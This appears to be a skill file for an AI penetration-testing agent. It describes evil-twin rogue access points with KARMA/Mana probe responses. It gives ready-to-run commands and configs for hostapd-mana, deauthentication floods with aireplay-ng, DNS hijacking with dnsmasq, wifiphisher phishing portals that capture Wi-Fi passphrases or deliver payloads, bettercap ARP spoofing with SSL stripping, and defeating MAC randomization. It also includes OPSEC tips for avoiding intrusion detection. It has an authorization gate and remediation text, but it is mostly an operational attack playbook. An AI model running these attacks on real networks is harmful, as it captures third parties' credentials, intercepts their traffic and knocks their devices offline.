evil-twin-karma

name: evil-twin-karma description: Evil-twin rogue AP with KARMA/Mana PNL-probe response, captive-portal credential capture, and post-association MITM for PSK/open networks. Distinct from wpa-enterprise-eap which targets 802.1X. allowed-tools: Bash Read Write metadata: subdomain: wireless when_to_use: "evil twin, KARMA, Mana, rogue AP, captive portal, hostapd-mana, wifiphisher, airgeddon, PNL, probe response, client coercion, PSK phishing, open network MITM" tags: - evil-twin - karma - mana - rogue-ap - captive-portal - mitm

mitre_attack: T1557, T1556, T1598

Evil Twin / KARMA / Mana Rogue AP

RoE hard stop (mirrors the wireless workflow loaded into your system prompt): NEVER bring up an evil-twin AP on public airspace without permitted_actions: evil_twin recorded in plan/roe.json for this session. Confirm iw reg get before any TX. This applies even on posture=loud — explicit operator approval is required.

Prerequisites

• TX-capable adapter (not just monitor mode).
• Tools: hostapd-mana, wifiphisher (portal templates), airgeddon (menu-driven alternative), dnsmasq, bettercap.
• Second adapter for deauth (optional but increases coercion speed).
• plan/roe.json must contain permitted_actions: evil_twin and valid regulatory TX authorization.

Step 1 — PNL / probe-request harvest

Preferred-Network List (PNL) probe requests reveal SSIDs a device will auto-associate to. Passive harvest before standing up the rogue AP:

# Capture probe requests (passive, no TX required)
sudo airodump-ng --output-format csv -w /tmp/probes <mon-iface>
# Probe column shows client MAC → SSID pairs

# Or use bettercap's wifi.recon
sudo bettercap -iface <mon-iface> \
    -eval "wifi.recon on; set wifi.show.sort clients desc; ticker on"
# Shows associated clients and their probe history

# KARMA universal: respond to ANY probe with a matching SSID.
# Mana selective: only respond to probes for SSIDs you choose
#   (lower noise, avoids responding to enterprise SSIDs that
#    require 802.1X — route those to wpa-enterprise-eap instead).

# Identify high-value targets:
# - Devices probing for open SSIDs (no PSK needed → immediate MITM)
# - Devices probing for PSK SSIDs you already know the passphrase for
# - Devices with MAC randomization disabled (OUI visible in probe SA)

Step 2 — Stand up rogue AP with hostapd-mana

# /tmp/mana.conf — open AP with KARMA/Mana response
cat > /tmp/mana.conf << 'EOF'
interface=<iface>
driver=nl80211
ssid=<TARGET_SSID>
hw_mode=g
channel=<CHANNEL>
mana_enable=1
mana_credout=/tmp/mana_creds.txt
mana_loud=0
EOF

sudo hostapd-mana /tmp/mana.conf

# mana_loud=0 → Mana selective (probe-response-only)
# mana_loud=1 → KARMA universal (respond to all probes)

# For a PSK-matching evil twin (clone of a known WPA2 PSK network):
cat > /tmp/evil_twin_psk.conf << 'EOF'
interface=<iface>
driver=nl80211
ssid=<TARGET_SSID>
hw_mode=g
channel=<CHANNEL>
wpa=2
wpa_passphrase=<KNOWN_PSK>
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
mana_enable=1
mana_credout=/tmp/mana_creds.txt
EOF

sudo hostapd-mana /tmp/evil_twin_psk.conf

Step 3 — Deauth-driven roaming coercion

# Deauth clients from the legitimate AP to accelerate association
# with the rogue AP. Requires permitted_actions: deauth_for_handshake_capture.
# Cross-reference deauth-pmf skill for PMF detection first.
sudo aireplay-ng --deauth 5 -a <LEGIT_BSSID> -c <CLIENT_MAC> <mon-iface2>

# Broadcast deauth (loud, posture=loud only):
sudo aireplay-ng --deauth 0 -a <LEGIT_BSSID> <mon-iface2>
# Note: broadcast deauth blocked by 802.11w/PMF; check PMF state first.

Step 4 — DHCP + DNS for associated clients

# dnsmasq: DHCP server + DNS for clients on the rogue AP
cat > /tmp/dnsmasq.conf << 'EOF'
interface=<iface>
dhcp-range=10.0.0.10,10.0.0.100,255.255.255.0,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
address=/#/10.0.0.1
log-queries
EOF

sudo ip addr add 10.0.0.1/24 dev <iface>
sudo ip link set <iface> up
sudo dnsmasq -C /tmp/dnsmasq.conf --no-daemon &

Step 5 — Captive portal credential capture (wifiphisher)

# wifiphisher automated portal attack
sudo wifiphisher \
    --essid "<TARGET_SSID>" \
    --channel <CHANNEL> \
    -p firmware-upgrade \
    --handshake-capture /tmp/wpa2_handshake.pcap

# Built-in portal templates:
#   firmware-upgrade    → asks for Wi-Fi PSK to "install firmware"
#   oauth-login         → OAuth/social login credential capture
#   wifi-connect        → generic Wi-Fi reconnect with PSK prompt
#   plugin_update       → browser plugin update (payload delivery)

# Captured credentials written to wifiphisher's output log.
# For custom portal: --phishing-pages-directory /path/to/custom/

# Manual transparent MITM with bettercap after client connects:
sudo bettercap -iface <iface> \
    -eval "
        set http.proxy.sslstrip true;
        set net.sniff.verbose false;
        net.probe on;
        arp.spoof on;
        http.proxy on;
        net.sniff on
    "
# bettercap captures credentials from HTTP/stripped HTTPS sessions.
# Output to /tmp/bettercap_creds.log

Step 6 — MAC-randomization defeat

Modern OS (Android 10+, iOS 14+, Windows 10+) use random MACs for probe requests, complicating targeting:

# De-anonymize via PNL analysis:
# 1. Capture probes over time; filter by sequence number continuity
#    (same device reuses sequence counter across random MACs).
tshark -r /tmp/probes-01.cap -Y "wlan.fc.type_subtype == 4" \
    -T fields -e wlan.sa -e wlan_mgt.ssid -e wlan.seq 2>/dev/null \
    | sort -k1,1 -k3,3n > /tmp/probe_seqs.txt

# 2. Same device will show incrementing seq nums even with different MACs.
# 3. Once the device associates to your rogue AP, it uses its real MAC
#    (most implementations reset randomization on association).

Evidence

# Portal-captured credential
kg_add_node(
    kind="credential",
    label=f"Captive portal PSK for {ssid}",
    props={
        "key": f"portal-cred::{bssid}::{client_mac}",
        "secret_type": "wpa_psk_phished",
        "ssid": ssid,
        "bssid": bssid,
        "client_mac": client_mac,
        "psk": psk,
        "portal_template": template_name,
        "captured_at": "<iso8601>",
        "source": "wifiphisher-portal",
    },
)

# PNL leak finding
kg_add_node(
    kind="finding",
    label="Client PNL Probe Leakage — Evil-Twin Viable",
    props={
        "key": f"pnl-leak::{client_mac}",
        "severity": "high",
        "exposed_ssids": [<ssid_list>],
        "client_mac": client_mac,
        "remediation": (
            "Enable MAC randomization and disable 'auto-connect' for "
            "saved networks. Use WPA3 with Protected Management Frames "
            "to prevent deauth-driven roaming."
        ),
    },
)

ZFP

1. airodump CSV showing client probe requests for target SSID.
2. hostapd-mana log showing client association to rogue AP.
3. wifiphisher output or bettercap log showing captured credential.
4. (Optional) Pcap of the full association + DHCP + portal flow.

OPSEC notes

• Mana selective is quieter than KARMA universal — only probed SSIDs get a response, reducing unexpected associations and WIDS alerts.
• Open AP (no PSK) has the fastest client association but exposes the rogue AP to casual discovery.
• wifiphisher generates detectable management frames; WIDS tuned for rogue APs will fire. Default posture: loud.
• Deauth coercion amplifies WIDS visibility; use single targeted deauth (--deauth 1) over broadcast where possible.
• Tear down the rogue AP immediately after credential capture to minimize dwell and collateral client disruption.

References

• hostapd-mana: github.com/sensepost/hostapd-mana
• wifiphisher: github.com/wifiphisher/wifiphisher
• airgeddon: github.com/v1s1t0r1sh3r3/airgeddon
• bettercap: bettercap.org
• wpa-enterprise-eap skill — use instead for 802.1X/MGT targets.
• deauth-pmf skill — PMF detection and targeted deauth mechanics.
• wpa3-sae skill — Path D captive portal for SAE networks.